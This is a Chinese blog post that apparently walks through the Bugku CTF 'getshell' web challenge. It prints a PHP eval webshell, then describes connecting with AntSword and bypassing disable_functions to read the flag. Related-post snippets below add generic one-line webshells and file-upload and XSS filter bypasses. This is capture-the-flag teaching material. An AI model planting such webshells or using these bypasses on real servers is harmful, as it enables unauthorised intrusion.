bugku web-getshell

最新推荐文章于 2022-10-25 21:51:16 发布
最新推荐文章于 2022-10-25 21:51:16 发布
阅读量332 收藏
点赞数 1
分类专栏: web CTF bugku 文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46578840/article/details/120140214
版权
CTF 同时被 3 个专栏收录
73 篇文章 1 订阅
订阅专栏
bugku
69 篇文章 0 订阅
订阅专栏
web
25 篇文章 2 订阅
订阅专栏

打开网址,发现被混淆了
在这里插入图片描述这,百度了很久,终于找到一篇关于解码混淆的文章
https://www.52pojie.cn/thread-1074918-1-1.html
搞了很久解出来得到

<?php
highlight_file(__FILE__);
@eval($_POST[ymlisisisiook]);
?>

用蚁剑链接
在这里插入图片描述发现只能再html目录下晃悠,写个phpinfo查看一下环境信息
在这里插入图片描述发现很多函数被禁用了,不过没有禁putenv,参考蚁剑插件之绕disable_functions
下载好插件,运行插件,选择第一个模式,点击开始
在这里插入图片描述上传成功,链接.antproxy.php
在这里插入图片描述根目录得到flag
在这里插入图片描述

星星明亮
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
BugKu_getshell
Kobalos的博客
09-07 2339
访问目标地址 看到是php的代码,格式应该是经过混淆加密的 推荐一个节省时间的网站: https://www.zhaoyuanma.com/phpjm.html 解出来发现是一个木马,试着用蚁剑连接一下,成功! 但是执行命令的时候显示red=127,猜测应该是有disable_functions对执行命令的函数进行限制,查看phpinfo确认一下 果然禁止的差不多了,试着用蚁剑插件市场下载的绕过工具进行绕过! 看到插件中显示的绕过需要的条件都满足了,直接点击开始,他会在当前目录下传文件 使用蚁.
bugku 求getshell
西部壮仔的博客
11-09 624
求getshell 文件上传漏洞,过滤 很明显这是一个文件上传的题,我们尝试去上传一句话木马 一共三个过滤 请求头部的 Content-Type 文件后缀 请求数据的Content-Type 这里是黑名单过滤来判断文件后缀,依次尝试php4,phtml,phtm,phps,php5(包括一些字母改变大小写) 最终发现,php5可以绕过 接下来,请求数据的Content-Type字段改为 i...
bugku——web基础$_GET
吃肉唐僧的博客
09-02 437
打开题目,发现如下代码 这段代码的意思就是用get方法what的参数请求,并且如果等于what的值等于flag就会输出flag 用hackbar请求,拿到flag
BugkuCTF-WEB题GET和POST
am_03的博客
08-25 538
GET 开启场景: 比较简单的get,构造payload?what=flag,得到flag POST 简单post,Firefox打开,F12弹出hackbar插件,添加post/what=flag,请求得到flag
bugku 求getshell(后缀黑名单检测和类型检测) writeup
xuchen16的博客
09-27 4734
这道题是后缀名黑名单检测和类型检测         1. 把请求头里面的Content-Type字母改成大写进行绕过         2. .jpg后面加上.php5其他的都被过滤了好像  如果是walf严格匹配,通过修改Content-type后字母的大小写可以绕过检测,使得需要上传的文件可以到达服务器端,而服务器的容错率较高,一般我们上传的文件可以解析。然后就需要确定我们如何上传文件,在...
K8 weblogic-CVE-2018-2628-getshell
07-16
K8 weblogic-CVE-2018-2628-getshell 渗透测试工具!请勿滥用! K8 weblogic-CVE-2018-2628-getshell 渗透测试工具!请勿滥用!
wordpress-getshell
06-05
Wordpress GetShell - 公共版 使用有效的用户名和密码组合,下面的脚本演示了如何自动植入 PHP shell 示例用法 %> perl wp-getshell.pl http://ubuntu64/wordpress admin admin [+] Logged in, replacing cookies ...
thinkphp5.X-Batch-getshell-master.rar
03-31
thinkphp5各版本通用poc
redis-getshell
06-05
redis-getshell 下面的脚本演示了通过 redis 服务器转储 webshel​​l 的可能性 用法 %> ./redis-getshell.pl --host 127.0.0.1 --port 6379 --path /tmp/ooo.php [+] Connection established 127.0.0.1:6379 [+] ...
Centos apt-get.sh
01-13
curl https://raw.githubusercontent.com/dvershinin/apt-get-centos/master/apt-get.sh -o /usr/local/bin/apt-get 不能直接下载,这里方便大家下载
bugku - Web
UP's blog
09-03 1935
刚刚入门CTF,如有错误,望大佬指教
Bugku-Getshell-wp】
qq_46202048的博客
10-25 282
bugku-getshell-wp 小菜鸡发一下以前的存档
生命在于学习——网站Getshell的方法
易水哲的博客
09-08 3564
网站Getshell的方法
BugkuCTF之web题之求getshell
A_dmin的博客
12-09 3003
BugkuCTF之web题之求getshell 一进来发现: maybe时绕过,那就用一句话木马吧!! php的一句话是:&amp;lt;?php @eval($_POST['pass']);?&amp;gt; asp的一句话是:&amp;lt;%eval request (&quot;pass&quot;)%&amp;gt; aspx的一句话是:&amp;lt;%@ Page Language=&quot;Jscript&amp
bugkuCTF Writeup (Web)36-40
Troublor的博客
02-01 3098
求getshell 文件上传绕过 上传一个php文件 用burp抓包 头部的Content-Type改成Multipart/form-data大小写绕过 请求内容里的Content-Type改成image 文件名改成php5 就绕过了 不太明白Multipart/form-data这里为什么变成大写能绕过,网上查也没查到,似乎并没有人关心multipart/form-dat
bugku ctf 各种绕过 (各种绕过哟)
qq_42777804的博客
08-17 6418
打开打开       阅读代码 发现 只要使uname的sha1的值与passwd的sha1的值相等即可,但是同时他们两个的值又不能相等 构造 http://120.24.86.145:8002/web7/?uname[]=1&amp;id=margin   并发送  passwd[]=2 的 postdata 请求即可   依旧利用简单 有特别 好安装的  火狐 插件 ...
bugku(XSS)
筱阳的博客
07-20 1102
    先试试是不是反射性注入   查看源代码     先试试&lt;script&gt;alert(/xss/)&lt;/script&gt;   查看源代码发现&lt;&gt;被过滤了 利用unicode编码绕过 &lt;  \u003c   &gt;  \u003e   再利用onerror事件 如果在加载图片时发生错误则执行 JavaScri...
sudo apt-get install ros-melodic-async-web-server-cpp* sudo apt-get install ros-melodic-web-video-server安装的前提文件
最新发布
05-05
这两个包是ROS(机器人操作系统)中用于Web服务器和视频流的功能包。在安装这两个包之前,您需要先安装ROS Melodic...sudo apt-get install ros-melodic-web-video-server ``` 安装完成后,您可以在ROS中使用这些包。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值